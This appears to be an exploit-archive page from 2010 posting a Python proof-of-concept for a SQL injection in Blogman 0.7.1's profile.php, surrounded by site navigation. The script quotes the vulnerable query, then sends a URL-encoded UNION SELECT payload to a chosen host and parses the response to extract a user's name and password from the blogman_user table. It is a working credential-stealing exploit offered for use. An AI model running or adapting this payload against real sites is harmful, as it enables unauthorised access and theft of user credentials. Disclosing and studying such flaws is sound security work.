Blogman 0.7.1 SQL Injection

Blogman 0.7.1 SQL Injection: Posted Aug 30, 2010; Authored by Ptrace Security; Blogman version 0.7.1 suffers from a remote SQL injection vulnerability in profile.php.; tags | exploit, remote, php, sql injection; SHA-256 | 135e2bf1f74d12fe3131e0915467b8bda02fda76b726fbca0ca94246a96a1776; Download | Favorite | View

Blogman 0.7.1 SQL Injection

#!/usr/bin/python
#
# Exploit Title:   Blogman v0.7.1 (profile.php) SQL Injection Exploit
# Date         :   28 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/blogman/
# Version      :   0.7.1
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + profile.php => SQL Injection!!
#
# 6:    $query = "SELECT * FROM ".$GLOBALS['dbTablePrefix']."user WHERE
#       UserID='".$_GET['id']."'";
# 7:    $profileuser = mysql_fetch_array(mysql_query($query));
#
# + profile.php => The query showed above returns a 16-columns table. UserName,
#   which is the 2nd column's name, is used few line after the query to display
#   the information extracted.
#
# 12:   echo $profileuser['UserName']."</p>\n";
#
 
import re
import sys
import http.client
import urllib.parse
 
 
def usage(prog):
    print('Usage  : ' + prog + ' <target> <path> <user_id>\n')
    print('Example: ' + prog + ' localhost /blogman/ 2')
    print('         ' + prog + ' www.example.com /complete/path/ 1')
    return
 
 
def exploit(target, path, userid):
    payload  = 'profile.php?id=-1%27%20UNION%20SELECT%20NULL,%20CONCAT(%27%3C1'
    payload += '%3E%27,UserName,%27:%27,UserPassword,%27%3C2%3E%27),%20NULL,%20'
    payload += 'NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,'
    payload += '%20NULL,%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20blogman_user'
    payload += '%20WHERE%20UserID=%27' + str(userid) + '%27%20--%20%27'
 
    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()
     
    if res.status != 200:
        print('[!] HTTP GET request failed.')
        exit(1)
 
    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r"<1>(.+?)<2>", re.M)
    m = pattern.search(data)
 
    if m:
        print('[+] Information Extracted:\n')
        print(m.group()[3:-3])
    else:
        print('[!] No information found')
         
    return
 
 
print('\n+-----------------------------------------------------------------------+')
print('| Blogman v0.7.1 (profile.php) SQL Injection Exploit by Ptrace Security |')
print('+-----------------------------------------------------------------------+\n')
 
if len(sys.argv) != 4:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])
 
exit(0)

Top Authors In Last 30 Days

Red Hat 278 files
indoushka 113 files
Ubuntu 89 files
Gentoo 32 files
Debian 21 files
LiquidWorm 19 files
Google Security Research 8 files
malvuln 5 files
Seth Jenkins 3 files
Emiliano Febbi 3 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,144)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,634)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,102)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,937)
UNIX (9,469)
UnixWare (188)
Windows (6,784)
Other

Blogman 0.7.1 SQL Injection

Blogman 0.7.1 SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Blogman 0.7.1 SQL Injection

Share This

Blogman 0.7.1 SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems